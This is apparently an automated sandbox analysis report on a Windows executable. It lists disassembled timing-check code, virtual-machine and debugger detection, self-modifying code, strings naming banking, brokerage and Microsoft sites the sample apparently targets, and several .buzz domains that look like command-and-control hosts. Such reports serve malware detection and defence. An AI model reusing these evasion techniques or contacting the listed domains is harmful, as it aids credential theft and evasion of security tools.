                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D503CD second address: 4D50405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 inc ebx 0x00000009 pushad 0x0000000a jmp 00007F0E3850A34Ch 0x0000000f popad 0x00000010 test al, al 0x00000012 jmp 00007F0E3850A350h 0x00000017 je 00007F0E3850A4B9h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push ebx 0x00000021 pop ecx 0x00000022 movsx ebx, cx 0x00000025 popad 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D50475 second address: 4D504B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F0E38E1CB1Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0E38E1CB1Eh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D504B2 second address: 4D504B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D504EF second address: 4D5052F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 6572h 0x00000007 push edi 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test eax, eax 0x0000000e jmp 00007F0E38E1CB25h 0x00000013 jg 00007F0EA9B2AA90h 0x00000019 pushad 0x0000001a push eax 0x0000001b mov cl, dh 0x0000001d pop ecx 0x0000001e mov edx, 2F78A7B8h 0x00000023 popad 0x00000024 js 00007F0E38E1CB5Ch 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D5052F second address: 4D50533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D50533 second address: 4D50539 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D50539 second address: 4D50578 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A34Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-14h], edi 0x0000000c jmp 00007F0E3850A356h 0x00000011 jne 00007F0EA9218280h 0x00000017 pushad 0x00000018 movzx esi, di 0x0000001b movsx edx, ax 0x0000001e popad 0x0000001f mov ebx, dword ptr [ebp+08h] 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D50578 second address: 4D5057C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D5057C second address: 4D50580 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D50580 second address: 4D50586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D50586 second address: 4D505BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A356h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-2Ch] 0x0000000c jmp 00007F0E3850A350h 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 movsx edx, si 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D505BD second address: 4D505DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D505DA second address: 4D50658 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F0E3850A355h 0x0000000d sub cx, 7286h 0x00000012 jmp 00007F0E3850A351h 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, esi 0x0000001a jmp 00007F0E3850A34Eh 0x0000001f nop 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 call 00007F0E3850A34Dh 0x00000028 pop eax 0x00000029 pushfd 0x0000002a jmp 00007F0E3850A351h 0x0000002f sub ah, 00000046h 0x00000032 jmp 00007F0E3850A351h 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D50658 second address: 4D50668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E38E1CB1Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D50668 second address: 4D5066C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D5066C second address: 4D506CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0E38E1CB1Eh 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F0E38E1CB1Dh 0x00000018 sbb cx, 7806h 0x0000001d jmp 00007F0E38E1CB21h 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007F0E38E1CB20h 0x00000029 xor ah, FFFFFFA8h 0x0000002c jmp 00007F0E38E1CB1Bh 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D506CD second address: 4D5073C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E3850A34Fh 0x00000009 or esi, 1FF5FBEEh 0x0000000f jmp 00007F0E3850A359h 0x00000014 popfd 0x00000015 mov ecx, 7A3A0377h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F0E3850A34Fh 0x00000027 xor cl, FFFFFFFEh 0x0000002a jmp 00007F0E3850A359h 0x0000002f popfd 0x00000030 push eax 0x00000031 pop edx 0x00000032 popad 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D5073C second address: 4D50742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D50742 second address: 4D50746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D50746 second address: 4D5074A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D50BE8 second address: 4D50BEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D50BEC second address: 4D50BF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D50CC9 second address: 4D50CD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A34Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D50CD8 second address: 4D50D06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 4105C7F7h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0E38E1CB1Ah 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D50D06 second address: 4D50D30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A34Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 34A4D431h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0E3850A350h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D50D30 second address: 4D50D36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D50D36 second address: 4D50D66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A34Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F0EA920F170h 0x0000000e push 75A52B70h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov eax, dword ptr [esp+10h] 0x0000001e mov dword ptr [esp+10h], ebp 0x00000022 lea ebp, dword ptr [esp+10h] 0x00000026 sub esp, eax 0x00000028 push ebx 0x00000029 push esi 0x0000002a push edi 0x0000002b mov eax, dword ptr [75AB4538h] 0x00000030 xor dword ptr [ebp-04h], eax 0x00000033 xor eax, ebp 0x00000035 push eax 0x00000036 mov dword ptr [ebp-18h], esp 0x00000039 push dword ptr [ebp-08h] 0x0000003c mov eax, dword ptr [ebp-04h] 0x0000003f mov dword ptr [ebp-04h], FFFFFFFEh 0x00000046 mov dword ptr [ebp-08h], eax 0x00000049 lea eax, dword ptr [ebp-10h] 0x0000004c mov dword ptr fs:[00000000h], eax 0x00000052 ret 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F0E3850A357h 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D50D66 second address: 4D50D6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | RDTSC instruction interceptor: First address: 4D50D6C second address: 4D50D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | RDTSC instruction interceptor: First address: 4D60AEF second address: 4D60AF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | RDTSC instruction interceptor: First address: 4D60AF3 second address: 4D60AF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | RDTSC instruction interceptor: First address: 4D60AF9 second address: 4D60B1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 mov bh, E0h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0E38E1CB27h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | RDTSC instruction interceptor: First address: 4D60B1E second address: 4D60B6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A359h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c jmp 00007F0E3850A353h 0x00000011 popad 0x00000012 xchg eax, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0E3850A355h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | RDTSC instruction interceptor: First address: 4D60B6A second address: 4D60BD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0E38E1CB21h 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 jmp 00007F0E38E1CB1Ch 0x00000016 mov eax, 0710F2E1h 0x0000001b popad 0x0000001c mov esi, dword ptr [ebp+0Ch] 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushfd 0x00000023 jmp 00007F0E38E1CB28h 0x00000028 sbb si, 46A8h 0x0000002d jmp 00007F0E38E1CB1Bh 0x00000032 popfd 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | RDTSC instruction interceptor: First address: 4D60BD5 second address: 4D60BED instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx eax, dx 0x00000009 popad 0x0000000a test esi, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0E3850A34Ah 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | RDTSC instruction interceptor: First address: 4D60BED second address: 4D60C85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F0EA9B0A2D1h 0x0000000f jmp 00007F0E38E1CB26h 0x00000014 cmp dword ptr [75AB459Ch], 05h 0x0000001b pushad 0x0000001c mov ax, 1EBDh 0x00000020 pushfd 0x00000021 jmp 00007F0E38E1CB1Ah 0x00000026 or eax, 53ADEE98h 0x0000002c jmp 00007F0E38E1CB1Bh 0x00000031 popfd 0x00000032 popad 0x00000033 je 00007F0EA9B2236Bh 0x00000039 jmp 00007F0E38E1CB26h 0x0000003e xchg eax, esi 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007F0E38E1CB1Eh 0x00000046 adc si, 3028h 0x0000004b jmp 00007F0E38E1CB1Bh 0x00000050 popfd 0x00000051 push eax 0x00000052 push edx 0x00000053 movzx ecx, dx 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | RDTSC instruction interceptor: First address: 4D60C85 second address: 4D60CB7 instructions: 0x00000000 rdtsc 0x00000002 mov bh, D5h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F0E3850A34Dh 0x0000000d xchg eax, esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0E3850A358h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | RDTSC instruction interceptor: First address: 4D60CB7 second address: 4D60CBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | RDTSC instruction interceptor: First address: 4D60CBB second address: 4D60CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | RDTSC instruction interceptor: First address: 4D60CC1 second address: 4D60CD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E38E1CB1Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | RDTSC instruction interceptor: First address: 4D60CFE second address: 4D60D0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E3850A34Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | RDTSC instruction interceptor: First address: 4D60D99 second address: 4D60DAB instructions: 0x00000000 rdtsc 0x00000002 mov dl, ch 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop esi 0x00000008 pushad 0x00000009 mov edi, 6E562F3Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 mov esi, edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | Special instruction interceptor: First address: 888825 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | Special instruction interceptor: First address: 888874 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | Special instruction interceptor: First address: A35D6D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | Special instruction interceptor: First address: A3530B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | Special instruction interceptor: First address: A3F4F1 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe TID: 6108 | Thread sleep time: -150000s >= -30000s
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe TID: 3720 | Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: IERiUft8Wi.exe, 00000000.00000002.1498883192.0000000000A17000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696492231s
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696492231
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696492231
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: IERiUft8Wi.exe, 00000000.00000003.1343856828.0000000000D4B000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000002.1499468644.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1450484970.0000000000D49000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1498352789.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1419235825.0000000000D49000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1467502633.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000002.1499314192.0000000000D17000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696492231t
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696492231p
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696492231f
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696492231
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696492231j
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696492231x
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696492231o
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: IERiUft8Wi.exe, 00000000.00000002.1498883192.0000000000A17000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: SICE
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | Process queried: DebugPort

                HIPS / PFW / Operating System Protection Evasion

                Source: IERiUft8Wi.exe, 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: hummskitnj.buzz
                Source: IERiUft8Wi.exe, 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: cashfuzysao.buzz
                Source: IERiUft8Wi.exe, 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: appliacnesot.buzz
                Source: IERiUft8Wi.exe, 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: screwamusresz.buzz
                Source: IERiUft8Wi.exe, 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: inherineau.buzz
                Source: IERiUft8Wi.exe, 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: scentniej.buzz
                Source: IERiUft8Wi.exe, 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: rebuildeso.buzz
                Source: IERiUft8Wi.exe, 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: prisonyfork.buzz
                Source: IERiUft8Wi.exe, 00000000.00000002.1498753254.0000000000831000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: mindhandru.buzz
                Source: IERiUft8Wi.exe, 00000000.00000002.1498883192.0000000000A17000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | Queries volume information: C:\ VolumeInformation
